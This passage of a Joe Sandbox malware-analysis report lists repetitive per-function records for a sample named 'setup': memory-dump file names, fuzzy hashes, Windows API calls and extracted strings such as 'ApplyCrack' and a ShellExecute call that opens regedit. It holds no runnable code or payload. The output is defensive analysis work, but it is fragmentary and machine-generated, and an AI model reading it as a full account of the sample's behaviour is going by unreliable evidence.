                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                                    • String ID: %ls
                                                                                                    • API String ID: 969438705-3246610740
                                                                                                    • Opcode ID: c1bfeffe4abddc0f28721261cb6c5fbce43567c97ff76b771942c8b77d2c392e
                                                                                                    • Instruction ID: 2fd11db68b99e62b33bab10b7fe40ac335e3892fce4c27e752a8729cbebff461
                                                                                                    • Opcode Fuzzy Hash: c1bfeffe4abddc0f28721261cb6c5fbce43567c97ff76b771942c8b77d2c392e
                                                                                                    • Instruction Fuzzy Hash: 2B015AB49083009FC341EF28D599A1ABBF4BB99344F408A2EE898C3311E739D9498F46
                                                                                                    APIs
                                                                                                      • Part of subcall function 001ED7A0: VirtualAlloc.KERNEL32 ref: 001ED817
                                                                                                    • exit.MSVCRT ref: 00200C2C
                                                                                                    Strings
                                                                                                    • ------------------------------------------------------------, xrefs: 00200C0D
                                                                                                    • Error: insufficient memory available%s, xrefs: 00200C15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtualexit
                                                                                                    • String ID: Error: insufficient memory available%s$------------------------------------------------------------
                                                                                                    • API String ID: 1690354023-2956387463
                                                                                                    • Opcode ID: 69ef18ce12177e30f40e81b69b2dbaae7da2e1bc2cd6ae8481c49af48ee3d3a4
                                                                                                    • Instruction ID: e8cbb9eb924f258bb34461d415fbb2c3e0df1d2bee58257148003819cffb3e30
                                                                                                    • Opcode Fuzzy Hash: 69ef18ce12177e30f40e81b69b2dbaae7da2e1bc2cd6ae8481c49af48ee3d3a4
                                                                                                    • Instruction Fuzzy Hash: 77F0F9F48097029FE700FF26D84935ABBE0FB45304F85C82DE48897255D7789599DF52
                                                                                                    APIs
                                                                                                      • Part of subcall function 001ED7A0: VirtualAlloc.KERNEL32 ref: 001ED817
                                                                                                    • exit.MSVCRT ref: 00200BAC
                                                                                                    Strings
                                                                                                    • ------------------------------------------------------------, xrefs: 00200B8D
                                                                                                    • Error: insufficient memory available%s, xrefs: 00200B95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtualexit
                                                                                                    • String ID: Error: insufficient memory available%s$------------------------------------------------------------
                                                                                                    • API String ID: 1690354023-2956387463
                                                                                                    • Opcode ID: f45e4b7728f4c4168f2c7e41790de16c35a5ef1b980c5d47101467a3aa5ff590
                                                                                                    • Instruction ID: f43249d3de3cdb995758829e5ee15279d728cba5d2ddaa874db02624174d3ffb
                                                                                                    • Opcode Fuzzy Hash: f45e4b7728f4c4168f2c7e41790de16c35a5ef1b980c5d47101467a3aa5ff590
                                                                                                    • Instruction Fuzzy Hash: 95F0F4B18197129FDB10AF22D88935ABBE0FB05348F418C1CE9D867292D774A459CF92
                                                                                                    APIs
                                                                                                    • RegisterClassExW.USER32 ref: 0024CB27
                                                                                                      • Part of subcall function 002470E0: GetLastError.KERNEL32 ref: 0024712B
                                                                                                      • Part of subcall function 002470E0: FormatMessageW.KERNEL32 ref: 00247163
                                                                                                      • Part of subcall function 002470E0: WideCharToMultiByte.KERNEL32 ref: 002471A7
                                                                                                    • LoadImageW.USER32 ref: 0024CB8F
                                                                                                    Strings
                                                                                                    • Win32: Failed to register window class, xrefs: 0024CB3A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharClassErrorFormatImageLastLoadMessageMultiRegisterWide
                                                                                                    • String ID: Win32: Failed to register window class
                                                                                                    • API String ID: 2904516539-2994954080
                                                                                                    • Opcode ID: b4644bc921cf514881bf3da824e5fde57055b1cf2778a56ae369259fb7610aa9
                                                                                                    • Instruction ID: b7deb36fc735c510c25c48b599d1438bab7f4637cf0683c2a105634d1b56520b
                                                                                                    • Opcode Fuzzy Hash: b4644bc921cf514881bf3da824e5fde57055b1cf2778a56ae369259fb7610aa9
                                                                                                    • Instruction Fuzzy Hash: 63F012B040D3018FE780AF28E54935BBBE0FB80348F10892CE4C95B244CBB995998B83
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • ------------------------------------------------------------, xrefs: 00200C0D
                                                                                                    • Error: insufficient memory available%s, xrefs: 00200C15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exit
                                                                                                    • String ID: Error: insufficient memory available%s$------------------------------------------------------------
                                                                                                    • API String ID: 2483651598-2956387463
                                                                                                    • Opcode ID: ecdd6042e1588dbd8748794b8f8710bc537e1313cda1f49d7944366031de0436
                                                                                                    • Instruction ID: 7701efd8f488ebc8ba6b4dcbba3944039ea4b002cd821433d2bfe86c49ecc80c
                                                                                                    • Opcode Fuzzy Hash: ecdd6042e1588dbd8748794b8f8710bc537e1313cda1f49d7944366031de0436
                                                                                                    • Instruction Fuzzy Hash: 13E012B14197129FDB11AF25C80538ABBE0FF46305F82C81CE4C8A3205CB74B58ADB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Error$InstallerThread: swprintfInvalid path.
                                                                                                    • API String ID: 2030045667-3505464976
                                                                                                    • Opcode ID: a27f43772b538f68d189aac1bd7f6616fbccaf0fdc89f094005540330a509443
                                                                                                    • Instruction ID: f47db89398117c5c1af081386c3fb97cc152db4f763586c1eecad39870a1dbf5
                                                                                                    • Opcode Fuzzy Hash: a27f43772b538f68d189aac1bd7f6616fbccaf0fdc89f094005540330a509443
                                                                                                    • Instruction Fuzzy Hash: D8E046B210C300CFE304AF64E50832BBBE0FB40312F02C82ED6998B200C3BA9008DB96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Error$InstallCallback: swprintfInvalid path.
                                                                                                    • API String ID: 2030045667-762969645
                                                                                                    • Opcode ID: 6605f90963ed52005f9cce4497b362a9671aef7971829cc9d0ca74b73b602935
                                                                                                    • Instruction ID: 3b7f7701b12e9b25fec39c393966a1a585454d35274538bec7949b4da6cff0df
                                                                                                    • Opcode Fuzzy Hash: 6605f90963ed52005f9cce4497b362a9671aef7971829cc9d0ca74b73b602935
                                                                                                    • Instruction Fuzzy Hash: 42D017B65083008ED300AF54E90835ABBA0EB80329F01C819D5D817214C3B540588B42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: ApplyCrack: swprintfInvalid path.$Error
                                                                                                    • API String ID: 2030045667-2879015136
                                                                                                    • Opcode ID: c0c50e309d349cf027e34fb3a1a32925b66b2045e334118c15fdea5c8e4eab1d
                                                                                                    • Instruction ID: 053afbdc3d84f6f8797fb43bd357ccf6e0cc455b8ceb8bc3e5661f1c87011c04
                                                                                                    • Opcode Fuzzy Hash: c0c50e309d349cf027e34fb3a1a32925b66b2045e334118c15fdea5c8e4eab1d
                                                                                                    • Instruction Fuzzy Hash: A5D05E714093009FD340AF14F50835ABBE0BB41305F41CD0DD09817204C3B64048CF47
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteShell
                                                                                                    • String ID: open$regedit
                                                                                                    • API String ID: 587946157-2848943099
                                                                                                    • Opcode ID: 21cc656678175cb9d0a5f3b72862665b926e9ff1a062e149b308d3764b3ee2d1
                                                                                                    • Instruction ID: 525819ad4b9f1f1a43e3e8972d5aeef80420e1ff1273f7c7736382d35c775b8a
                                                                                                    • Opcode Fuzzy Hash: 21cc656678175cb9d0a5f3b72862665b926e9ff1a062e149b308d3764b3ee2d1
                                                                                                    • Instruction Fuzzy Hash: B8D06CB540C7029FD301AF24C91830BBBF0BB82706F02C90DE5991B285C7B899489F9B
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Error$Install: swprintfInvalid path.
                                                                                                    • API String ID: 2030045667-3780951377
                                                                                                    • Opcode ID: 53b2588e350661daa23667fd37b614c9df7a8efd4753d4b2fb54b7f0370d1558
                                                                                                    • Instruction ID: 95c9edf8bd500bf3aeb5447b972846e792625a651ad3e3fc861ed2bd3107bcb6
                                                                                                    • Opcode Fuzzy Hash: 53b2588e350661daa23667fd37b614c9df7a8efd4753d4b2fb54b7f0370d1558
                                                                                                    • Instruction Fuzzy Hash: B1D092B54097059BD708AF54D94821ABBE0BB41345F82CC0DE9991B205D3B694999F42
                                                                                                    APIs
